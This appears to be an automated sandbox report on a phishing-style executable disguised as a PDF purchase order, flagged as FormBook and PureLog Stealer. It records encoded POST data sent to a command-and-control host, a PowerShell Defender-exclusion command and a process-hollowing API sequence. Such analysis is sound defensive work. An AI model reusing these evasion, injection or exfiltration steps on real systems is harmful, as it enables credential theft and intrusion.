                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Domain parking page</title> <link rel="stylesheet" href="/styles/css/index.css"> <link rel="shortcut icon" href="https://static.fasthosts.co.uk/icons/favicon.ico" type="image/x-icon" /> ... Global site tag (gtag.js) - Google Analytics --> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-199510482-1"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-199510482-1'); </script> </head><body> <div class="container"> <nav class="logo"> <a href="https://fasthosts.co.uk/" rel="nofollow"> <img src="/assets/fasthosts-logo-secondary.svg" alt="Fasthosts"></img> </a> </nav> <main> <h2>Welcome to <span class="domain
                                                                              Jan 14, 2025 12:03:44.546106100 CET1236INData Raw: 56 61 72 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 68 32 3e 0a 20 20 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 69 73 20 70 61 72 6b 65 64 20 66 6f 72 20 46 52 45 45 20 62 79 0a 20 20 20 20 20 20 20
                                                                              Data Ascii: Var"></span></h2> <p> This domain name is parked for FREE by <strong><a href="https://fasthosts.co.uk/" rel="nofollow">fasthosts.co.uk</a></strong> </p> <div class="row"> <div class="card card--is-cta
                                                                              Jan 14, 2025 12:03:44.546124935 CET448INData Raw: 6f 2e 75 6b 2f 63 6f 6e 74 61 63 74 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 64 6f 6d 61 69 6e 70 61 72 6b 69 6e 67 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 72 65 66 65 72 72 61 6c 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 66 68 5f 70 61 72 6b 69 6e 67 5f
                                                                              Data Ascii: o.uk/contact?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_parking_contact">Contact us</a> </main> </div> <script> const cleanHostname = document.location.hostname.indexOf("www.") && document.location.hostname || do
                                                                              Jan 14, 2025 12:03:44.546148062 CET176INData Raw: 60 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 73 74 68 6f 73 74 73 2e 63 6f 2e 75 6b 2f 64 6f 6d 61 69 6e 2d 6e 61 6d 65 73 2f 73 65 61 72 63 68 2f 3f 64 6f 6d 61 69 6e 3d 24 7b 63 6c 65 61 6e 48 6f 73 74 6e 61 6d 65 7d 26 75 74 6d 5f 73 6f 75 72
                                                                              Data Ascii: `https://www.fasthosts.co.uk/domain-names/search/?domain=${cleanHostname}&utm_source=domainparking&utm_medium=referral&utm_campaign=fh_parking_dac` </script></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              29192.168.2.54949985.159.66.93802520C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 12:03:49.684063911 CET674OUTPOST /coi2/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 204
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Host: www.letsbookcruise.xyz
                                                                              Origin: http://www.letsbookcruise.xyz
                                                                              Referer: http://www.letsbookcruise.xyz/coi2/
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Data Raw: 74 30 41 3d 77 63 4d 30 5a 70 4f 55 69 5a 66 49 71 54 51 32 4b 6e 55 6e 51 6c 55 69 52 33 41 46 6a 51 38 2f 59 32 76 63 33 48 66 68 4a 42 31 46 4c 47 6b 56 4b 76 66 33 36 62 46 51 6e 4f 79 33 56 64 6a 65 4e 43 57 4e 61 49 32 73 30 50 50 72 5a 30 52 74 6c 7a 72 75 47 35 62 47 38 6d 43 52 51 78 59 70 42 6d 4b 71 4e 32 66 71 64 42 47 65 4f 4f 56 68 39 72 51 73 53 58 64 4b 47 72 6d 47 46 7a 57 70 71 71 38 74 6e 74 69 67 61 45 65 47 78 2b 46 41 59 6d 4f 5a 45 71 76 79 6c 42 51 4c 51 53 7a 46 4b 69 38 43 78 71 69 68 2b 5a 66 7a 6a 33 70 77 59 4e 58 62 4d 39 2f 64 50 6c 4a 54 73 39 31 65 75 4c 49 73 36 77 67 3d
                                                                              Data Ascii: t0A=wcM0ZpOUiZfIqTQ2KnUnQlUiR3AFjQ8/Y2vc3HfhJB1FLGkVKvf36bFQnOy3VdjeNCWNaI2s0PPrZ0RtlzruG5bG8mCRQxYpBmKqN2fqdBGeOOVh9rQsSXdKGrmGFzWpqq8tntigaEeGx+FAYmOZEqvylBQLQSzFKi8Cxqih+Zfzj3pwYNXbM9/dPlJTs91euLIs6wg=


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              30192.168.2.54950085.159.66.93802520C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 12:03:52.226914883 CET694OUTPOST /coi2/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 224
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Host: www.letsbookcruise.xyz
                                                                              Origin: http://www.letsbookcruise.xyz
                                                                              Referer: http://www.letsbookcruise.xyz/coi2/
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Data Raw: 74 30 41 3d 77 63 4d 30 5a 70 4f 55 69 5a 66 49 70 7a 41 32 50 41 49 6e 42 56 55 74 50 48 41 46 6f 77 39 34 59 32 7a 63 33 47 62 78 4a 79 52 46 49 6a 59 56 4c 75 66 33 35 62 46 51 6f 75 79 79 49 4e 6a 72 4e 43 71 76 61 4b 69 73 30 4f 76 72 5a 78 74 74 6c 67 7a 68 46 4a 62 59 30 47 43 58 64 52 59 70 42 6d 4b 71 4e 79 50 55 64 42 65 65 4f 2b 6c 68 76 36 51 6a 62 33 64 4a 50 4c 6d 47 42 7a 58 69 71 71 38 66 6e 75 6d 4b 61 42 61 47 78 38 64 41 57 54 79 57 64 36 76 77 6f 68 51 59 51 67 75 67 4d 78 59 5a 78 61 6e 59 76 65 37 70 6d 42 59 61 43 76 66 7a 66 64 54 6c 66 32 42 6b 39 4e 55 33 30 6f 59 63 6b 6e 32 6b 46 75 62 67 2b 6c 5a 53 30 53 4b 6c 33 78 37 36 69 34 62 77
                                                                              Data Ascii: t0A=wcM0ZpOUiZfIpzA2PAInBVUtPHAFow94Y2zc3GbxJyRFIjYVLuf35bFQouyyINjrNCqvaKis0OvrZxttlgzhFJbY0GCXdRYpBmKqNyPUdBeeO+lhv6Qjb3dJPLmGBzXiqq8fnumKaBaGx8dAWTyWd6vwohQYQgugMxYZxanYve7pmBYaCvfzfdTlf2Bk9NU30oYckn2kFubg+lZS0SKl3x76i4bw


                                                                              Statistics

                                                                              CPU Usage

                                                                              Click to jump to process

                                                                              Memory Usage

                                                                              Click to jump to process

                                                                              High Level Behavior Distribution

                                                                              Click to dive into process behavior distribution

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Target ID:0
                                                                              Start time:06:00:45
                                                                              Start date:14/01/2025
                                                                              Path:C:\Users\user\Desktop\PO 2025918 pdf.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\PO 2025918 pdf.exe"
                                                                              Imagebase:0xea0000
                                                                              File size:765'952 bytes
                                                                              MD5 hash:625D2FAE7B900A58C7E9DAED1F85CAB3
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2220434300.0000000005C10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2211278593.00000000043B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2200491712.00000000033F2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:4
                                                                              Start time:06:01:01
                                                                              Start date:14/01/2025
                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 2025918 pdf.exe"
                                                                              Imagebase:0x7f0000
                                                                              File size:433'152 bytes
                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:5
                                                                              Start time:06:01:01
                                                                              Start date:14/01/2025
                                                                              Path:C:\Users\user\Desktop\PO 2025918 pdf.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\PO 2025918 pdf.exe"
                                                                              Imagebase:0xaa0000
                                                                              File size:765'952 bytes
                                                                              MD5 hash:625D2FAE7B900A58C7E9DAED1F85CAB3
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2458301870.0000000001550000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2453984968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2460325125.0000000004BB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:6
                                                                              Start time:06:01:01
                                                                              Start date:14/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:7
                                                                              Start time:06:01:19
                                                                              Start date:14/01/2025
                                                                              Path:C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe"
                                                                              Imagebase:0x5c0000
                                                                              File size:140'800 bytes
                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3896619038.0000000005FA0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:8
                                                                              Start time:06:01:21
                                                                              Start date:14/01/2025
                                                                              Path:C:\Windows\SysWOW64\ROUTE.EXE
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\SysWOW64\ROUTE.EXE"
                                                                              Imagebase:0x3d0000
                                                                              File size:19'456 bytes
                                                                              MD5 hash:C563191ED28A926BCFDB1071374575F1
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3895858991.0000000002AC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3895986128.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:moderate
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:10
                                                                              Start time:06:01:34
                                                                              Start date:14/01/2025
                                                                              Path:C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe"
                                                                              Imagebase:0x5c0000
                                                                              File size:140'800 bytes
                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3898145012.0000000005750000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:11
                                                                              Start time:06:01:46
                                                                              Start date:14/01/2025
                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                              Imagebase:0x7ff79f9e0000
                                                                              File size:676'768 bytes
                                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Disassembly

                                                                              Reset < >

                                                                                Execution Graph

                                                                                Execution Coverage:10.2%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:1.9%
                                                                                Total number of Nodes:162
                                                                                Total number of Limit Nodes:8
                                                                                execution_graph 33017 1a0aed0 33018 1a0aed1 33017->33018 33021 1a0b3c1 33018->33021 33019 1a0aedf 33022 1a0b3d0 33021->33022 33023 1a0b404 33022->33023 33024 1a0b608 GetModuleHandleW 33022->33024 33023->33019 33025 1a0b635 33024->33025 33025->33019 32991 7c225d0 32993 7c225d5 32991->32993 32992 7c2275b 32993->32992 32996 7c22850 PostMessageW 32993->32996 32998 7c22849 PostMessageW 32993->32998 32997 7c228bc 32996->32997 32997->32993 32999 7c228bc 32998->32999 32999->32993 32970 1a04668 32971 1a04669 32970->32971 32972 1a04686 32971->32972 32974 1a04778 32971->32974 32975 1a0477c 32974->32975 32979 1a04888 32975->32979 32983 1a04878 32975->32983 32981 1a04889 32979->32981 32980 1a0498c 32980->32980 32981->32980 32987 1a044f0 32981->32987 32985 1a0487c 32983->32985 32984 1a0498c 32984->32984 32985->32984 32986 1a044f0 CreateActCtxA 32985->32986 32986->32984 32988 1a05918 CreateActCtxA 32987->32988 32990 1a059db 32988->32990 33000 1a0d378 33001 1a0d37d 33000->33001 33005 1a0d547 33001->33005 33009 1a0d558 33001->33009 33002 1a0d4ab 33006 1a0d554 33005->33006 33013 1a0b3b0 33006->33013 33010 1a0d559 33009->33010 33011 1a0b3b0 DuplicateHandle 33010->33011 33012 1a0d586 33011->33012 33012->33002 33014 1a0d9c8 DuplicateHandle 33013->33014 33016 1a0d586 33014->33016 33016->33002 33026 7c2063f 33027 7c20530 33026->33027 33028 7c2045c 33026->33028 33028->33027 33032 7c21428 33028->33032 33047 7c2149e 33028->33047 33063 7c21438 33028->33063 33033 7c21438 33032->33033 33078 7c21c9b 33033->33078 33083 7c22067 33033->33083 33088 7c21a67 33033->33088 33092 7c21b37 33033->33092 33096 7c21d70 33033->33096 33100 7c21f30 33033->33100 33106 7c2192c 33033->33106 33111 7c2187f 33033->33111 33116 7c2201e 33033->33116 33120 7c21e2e 33033->33120 33125 7c21c28 33033->33125 33131 7c21f0b 33033->33131 33034 7c2145a 33034->33027 33048 7c2142c 33047->33048 33050 7c214a1 33047->33050 33051 7c21f30 2 API calls 33048->33051 33052 7c21d70 2 API calls 33048->33052 33053 7c21b37 2 API calls 33048->33053 33054 7c21a67 2 API calls 33048->33054 33055 7c22067 2 API calls 33048->33055 33056 7c21c9b 2 API calls 33048->33056 33057 7c21f0b 2 API calls 33048->33057 33058 7c21c28 2 API calls 33048->33058 33059 7c21e2e 2 API calls 33048->33059 33060 7c2201e 2 API calls 33048->33060 33061 7c2187f 2 API calls 33048->33061 33062 7c2192c 2 API calls 33048->33062 33049 7c2145a 33049->33027 33050->33027 33051->33049 33052->33049 33053->33049 33054->33049 33055->33049 33056->33049 33057->33049 33058->33049 33059->33049 33060->33049 33061->33049 33062->33049 33064 7c21452 33063->33064 33066 7c21f30 2 API calls 33064->33066 33067 7c21d70 2 API calls 33064->33067 33068 7c21b37 2 API calls 33064->33068 33069 7c21a67 2 API calls 33064->33069 33070 7c22067 2 API calls 33064->33070 33071 7c21c9b 2 API calls 33064->33071 33072 7c21f0b 2 API calls 33064->33072 33073 7c21c28 2 API calls 33064->33073 33074 7c21e2e 2 API calls 33064->33074 33075 7c2201e 2 API calls 33064->33075 33076 7c2187f 2 API calls 33064->33076 33077 7c2192c 2 API calls 33064->33077 33065 7c2145a 33065->33027 33066->33065 33067->33065 33068->33065 33069->33065 33070->33065 33071->33065 33072->33065 33073->33065 33074->33065 33075->33065 33076->33065 33077->33065 33079 7c21ca1 33078->33079 33080 7c21c16 33079->33080 33136 932f4c0 33079->33136 33140 932f4b8 33079->33140 33080->33034 33084 7c220e3 33083->33084 33144 932f9a0 33084->33144 33148 932f9a8 33084->33148 33085 7c21ae0 33085->33034 33152 932fc30 33088->33152 33156 932fc2a 33088->33156 33089 7c21991 33089->33034 33094 932f9a0 Wow64SetThreadContext 33092->33094 33095 932f9a8 Wow64SetThreadContext 33092->33095 33093 7c21b51 33093->33034 33094->33093 33095->33093 33160 932fb40 33096->33160 33164 932fb3a 33096->33164 33097 7c21cf3 33101 7c21f3d 33100->33101 33102 7c21cbf 33100->33102 33102->33100 33103 7c21c16 33102->33103 33104 932f4c0 ResumeThread 33102->33104 33105 932f4b8 ResumeThread 33102->33105 33103->33034 33104->33102 33105->33102 33107 7c21932 33106->33107 33168 7c20040 33107->33168 33172 7c20036 33107->33172 33112 7c218b3 33111->33112 33113 7c21966 33112->33113 33114 7c20040 CreateProcessA 33112->33114 33115 7c20036 CreateProcessA 33112->33115 33114->33113 33115->33113 33176 932fa80 33116->33176 33180 932fa7a 33116->33180 33117 7c2203c 33121 7c21e34 33120->33121 33123 932fb40 WriteProcessMemory 33121->33123 33124 932fb3a WriteProcessMemory 33121->33124 33122 7c21991 33122->33034 33123->33122 33124->33122 33126 7c21c2e 33125->33126 33127 7c22076 33126->33127 33129 932fb40 WriteProcessMemory 33126->33129 33130 932fb3a WriteProcessMemory 33126->33130 33128 7c21991 33128->33034 33129->33128 33130->33128 33132 7c21f11 33131->33132 33134 932fb40 WriteProcessMemory 33132->33134 33135 932fb3a WriteProcessMemory 33132->33135 33133 7c21f8e 33134->33133 33135->33133 33137 932f500 ResumeThread 33136->33137 33139 932f531 33137->33139 33139->33079 33141 932f4c0 ResumeThread 33140->33141 33143 932f531 33141->33143 33143->33079 33145 932f9a8 Wow64SetThreadContext 33144->33145 33147 932fa35 33145->33147 33147->33085 33149 932f9ed Wow64SetThreadContext 33148->33149 33151 932fa35 33149->33151 33151->33085 33153 932fc7b ReadProcessMemory 33152->33153 33155 932fcbf 33153->33155 33155->33089 33157 932fc30 ReadProcessMemory 33156->33157 33159 932fcbf 33157->33159 33159->33089 33161 932fb88 WriteProcessMemory 33160->33161 33163 932fbdf 33161->33163 33163->33097 33165 932fb40 WriteProcessMemory 33164->33165 33167 932fbdf 33165->33167 33167->33097 33169 7c200c9 33168->33169 33169->33169 33170 7c2022e CreateProcessA 33169->33170 33171 7c2028b 33170->33171 33173 7c200c9 33172->33173 33173->33173 33174 7c2022e CreateProcessA 33173->33174 33175 7c2028b 33174->33175 33177 932fac0 VirtualAllocEx 33176->33177 33179 932fafd 33177->33179 33179->33117 33181 932fa80 VirtualAllocEx 33180->33181 33183 932fafd 33181->33183 33183->33117

                                                                                Executed Functions

                                                                                Function 01A07018 Relevance: 1.4, Strings: 1, Instructions: 179COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2200363620.0000000001A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1a00000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Ppjq
                                                                                • API String ID: 0-111704681
                                                                                • Opcode ID: c3dfbc35dd9d66a2a9abdc120eedf5aed011928cdb3a8000c584b61a46945a62
                                                                                • Instruction ID: 1e3e6d1e26fb7828beaa553bc421835481d815477227851e648d988c3572aa43
                                                                                • Opcode Fuzzy Hash: c3dfbc35dd9d66a2a9abdc120eedf5aed011928cdb3a8000c584b61a46945a62
                                                                                • Instruction Fuzzy Hash: 2481B474E002199FDB15DFA9D984AEEBBF6FF88300F20812AD918A7365DB346945CF50
                                                                                Function 01A04204 Relevance: 1.4, Strings: 1, Instructions: 176COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2200363620.0000000001A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1a00000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Ppjq
                                                                                • API String ID: 0-111704681
                                                                                • Opcode ID: d92469e92cf6c2a05d74435b3ddd91e1bf5eb8dfdcc49b8f7ae8be6eaaed482c
                                                                                • Instruction ID: 0078764ac48f2da58bdd9825deabf3944b3e2b76ed7ba6c8622ae97a2eefea52
                                                                                • Opcode Fuzzy Hash: d92469e92cf6c2a05d74435b3ddd91e1bf5eb8dfdcc49b8f7ae8be6eaaed482c
                                                                                • Instruction Fuzzy Hash: E681B574E002189FCB15DFA9D984AEEBBF6FF88300F208129D819A7365DB346945CF50
                                                                                Function 0932A6F2 Relevance: 1.4, Strings: 1, Instructions: 141COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2224157504.0000000009320000.00000040.00000800.00020000.00000000.sdmp, Offset: 09320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_9320000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: r
                                                                                • API String ID: 0-1812594589
                                                                                • Opcode ID: 366e284be8ffb8c7b85edd104d3eadbaf3b55388a6f1057d5ec573996bcb895f
                                                                                • Instruction ID: 6b4d573d2bc612b67bc53a07f1b531e328edf7004672c5c17be620731df66626
                                                                                • Opcode Fuzzy Hash: 366e284be8ffb8c7b85edd104d3eadbaf3b55388a6f1057d5ec573996bcb895f
                                                                                • Instruction Fuzzy Hash: B3515C34D09228DFDB04CFAAD4449AEBBBAFF4A301F15D1A9E415E76A2C7359942CF40
                                                                                Function 09326020 Relevance: .3, Instructions: 289COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2224157504.0000000009320000.00000040.00000800.00020000.00000000.sdmp, Offset: 09320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_9320000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 20ca6825cbe1c251c7137bfb55415d399d9e7ddf77304691c62f6f13e2941668
                                                                                • Instruction ID: 1a7a0ebc3fc3264adbc5caeead1580e22a21ba3851afca7821e0136c3745bc79
                                                                                • Opcode Fuzzy Hash: 20ca6825cbe1c251c7137bfb55415d399d9e7ddf77304691c62f6f13e2941668
                                                                                • Instruction Fuzzy Hash: 59C1C074E08228CFDB14CFA9C8457AEBBF6BF89304F14D16AD508A7255DB309985CF50
                                                                                Function 0932600F Relevance: .3, Instructions: 275COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2224157504.0000000009320000.00000040.00000800.00020000.00000000.sdmp, Offset: 09320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_9320000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6618cdf97ebbc7f27e8fb4b7c9cb6ba9b9748adac966dd8810e0aa4f6a8eaded
                                                                                • Instruction ID: 51f8a595d2e2f6d18c76ca859cb18d78201e1509114a4dd57bc45e62640a8201
                                                                                • Opcode Fuzzy Hash: 6618cdf97ebbc7f27e8fb4b7c9cb6ba9b9748adac966dd8810e0aa4f6a8eaded
                                                                                • Instruction Fuzzy Hash: 7CC1D174E08228CFDB14CFAAC8457AEBBF6BF89304F14D1AAD418A7255DB349985CF41
                                                                                Function 09329CD8 Relevance: .1, Instructions: 66COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2224157504.0000000009320000.00000040.00000800.00020000.00000000.sdmp, Offset: 09320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_9320000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6935456e24bd09cfa1a86c8f806a7f26950c21131ac10822fbddbf9a612b89f0
                                                                                • Instruction ID: c44d19bb924bfc0acc0bf6be74fdb218711a7f265fe5d67c480b34709acc3be7
                                                                                • Opcode Fuzzy Hash: 6935456e24bd09cfa1a86c8f806a7f26950c21131ac10822fbddbf9a612b89f0
                                                                                • Instruction Fuzzy Hash: 272104B1D046598BDB18CFABCD043EEBAFAAFC9341F04C06AD409A62A5DB7509458F90
                                                                                Function 07C21C9B Relevance: .1, Instructions: 52COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2223192289.0000000007C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7c20000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 82601257d36ae8acd9685536911166c8a4d5e8769b8cab25598feaddc425fdde
                                                                                • Instruction ID: 6bf19618a83c63505091e6d2d6ee9ed17b6322b2a933a7899971ab20b7d7e9ef
                                                                                • Opcode Fuzzy Hash: 82601257d36ae8acd9685536911166c8a4d5e8769b8cab25598feaddc425fdde
                                                                                • Instruction Fuzzy Hash: 3F110DB4908268CFCB24CF55D8487F8BBB5FB5A311F0955E9C40DA7292D7344A86DF10
                                                                                Function 07C20036 Relevance: 1.7, APIs: 1, Instructions: 244processCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
